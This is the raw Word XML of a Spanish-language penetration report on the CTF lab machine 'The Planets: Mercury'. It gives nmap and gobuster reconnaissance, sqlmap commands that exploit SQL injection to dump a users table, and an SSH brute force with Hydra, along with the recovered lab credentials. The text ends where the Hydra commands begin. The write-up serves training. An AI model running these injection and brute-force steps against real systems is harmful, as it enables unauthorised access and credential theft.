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70CF" w:rsidRDefault="001770CF" w:rsidP="001770CF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="001770CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">nforme de Penetración </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001770CF" w:rsidRPr="001770CF" w:rsidRDefault="001770CF" w:rsidP="001770CF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Máquina CTF "The Planets: Mercury"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001770CF" w:rsidRDefault="001770CF" w:rsidP="001770CF"/>
    <w:p w:rsidR="001770CF" w:rsidRPr="001770CF" w:rsidRDefault="001770CF" w:rsidP="001770CF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Introducción:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001770CF" w:rsidRPr="001770CF" w:rsidRDefault="001770CF" w:rsidP="001770CF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770CF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>La presente es un informe detallado sobre las actividades de penetración llevadas a cabo en la máquina CTF "The Planets: Mercury". El objetivo principal del ejercicio era obtener acceso a la máquina víctima y obtener los privilegios de root. A continuación, se describen las etapas del proceso de penetración y los resultados obtenidos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001770CF" w:rsidRDefault="001770CF" w:rsidP="001770CF"/>
    <w:p w:rsidR="001770CF" w:rsidRPr="001770CF" w:rsidRDefault="001770CF" w:rsidP="001770CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Escaneo de Puertos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001770CF" w:rsidRDefault="001770CF" w:rsidP="001770CF">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001770CF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Se realizó un escaneo de puertos utilizando la herramienta Nmap, obteniendo los siguientes resultados:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001770CF" w:rsidRPr="001770CF" w:rsidRDefault="001770CF" w:rsidP="001770CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001770CF">
        <w:t xml:space="preserve">22/tcp   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001770CF" w:rsidRPr="001770CF" w:rsidRDefault="001770CF" w:rsidP="001770CF">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001770CF">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">8080/tcp </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6C98" w:rsidRDefault="001770CF" w:rsidP="001770CF">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Se identificaron dos servicios activos: SSH en el puerto 22/tcp y un servidor proxy HTTP en el puerto 8080/tcp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00D8771F" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B21097">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B21097">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nmap -sS -sV &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B21097">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00B21097" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nmap -sC -p22,80  &lt;IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRDefault="00524379" w:rsidP="00524379"/>
    <w:p w:rsidR="00524379" w:rsidRPr="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Enumeración de Directorios:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Se utilizó la herramienta Gobuster para realizar una enumeración de directorios en la máquina objetivo. Se encontraron los siguientes resultados relevantes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>"/robots.txt" (Estado: 200, Tamaño: 26 bytes): Se descubrió la existencia de un archivo robots.txt que permitía el acceso.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>En el archivo "/robots.txt" se encontró la directiva "User-agent: *" que indica que se aplica a todos los agentes de usuario. La directiva "Disallow: /" indica que no se permite el acceso a ningún directorio o archivo en la raíz del sitio web. Esto podría ser un indicio de que los desarrolladores han tratado de ocultar información o limitar el acceso a ciertas áreas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>En el directorio "/", se encontraron los siguientes elementos: "index" y "robots.txt". "index" parece ser un archivo y "robots.txt" es el archivo que analizaste anteriormente. Además, se encontró un directorio llamado "mercuryfacts/".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRDefault="00524379" w:rsidP="00524379"/>
    <w:p w:rsidR="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Al explorar el directorio "mercuryfacts/", se encontró una página web que muestra una imagen de una luna y dos enlaces: "Mercury Facts: Load a fact" y "Website Todo List: See list". Al hacer clic en "Load a fact", se redirige a una página con la URL http://192.168.20.27:8080/mercuryfacts/1/ donde se pueden cambiar los IDs para mostrar diferentes hechos. Esto podría indicar una posible vulnerabilidad que debemos investigar más a fondo</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>gobuster dir -u http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;IP&gt;:8080/</w:t>
      </w:r>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Explotación de Vulnerabilidades:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enumeración de Bases de Datos con SQLmap:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Se utilizó SQLmap para enumerar las bases de datos disponibles en la máquina. Se encontraron dos bases de datos: "facts" y "mercury".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sqlmap -u http://</w:t>
      </w:r>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&lt;IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:8080/mercuryfacts/ --dbs --batch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enumeración de Tablas y Datos de la Base de Datos "mercury":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Se continuó utilizando SQLmap para enumerar las tablas de la base de datos "mercury". Se identificaron las tablas "fact" y "users". Luego, se extrajeron los datos de la tabla "users", revelando cuatro registros con información de usuarios y contraseñas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRDefault="00C6610E" w:rsidP="00524379">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0559BAA9" wp14:editId="62812DA6">
            <wp:extent cx="4000000" cy="1323810"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="19849129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12994" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4000000" cy="1323810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRDefault="00BA1326" w:rsidP="00524379">
      <w:pPr>
        <w:ind w:left="426"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Estos datos revelan información de usuarios y contraseñas almacenadas en la tabla "users". Con esta información, podemos proceder a utilizar las credenciales encontradas para intentar obtener acceso y obtener los privilegios root en la máquina "The Planets: Mercury".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00524379" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524379">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00BA1326" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://192.168.20.27:8080/mercuryfacts/ -D mercury </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524379" w:rsidRPr="00BA1326" w:rsidRDefault="00524379" w:rsidP="00524379">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sqlmap -u http://192.168.20.27:8080/mercuryfacts/ -D mercury -T users --dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Fuerza Bruta de Credenciales SSH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:t>Se crearon listas de usuarios y contraseñas para realizar un ataque de fuerza bruta en el servicio SSH. Mediante el uso de la herramienta Hydra, se logró obtener acceso con las siguientes credenciales:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Host: 192.168.20.27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Usuario: webmaster</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Contraseña: mercuryisthesizeof0.056Earths</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1326">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Comandos: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1326" w:rsidRPr="00BA1326" w:rsidRDefault="00BA1326" w:rsidP="00BA1326">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
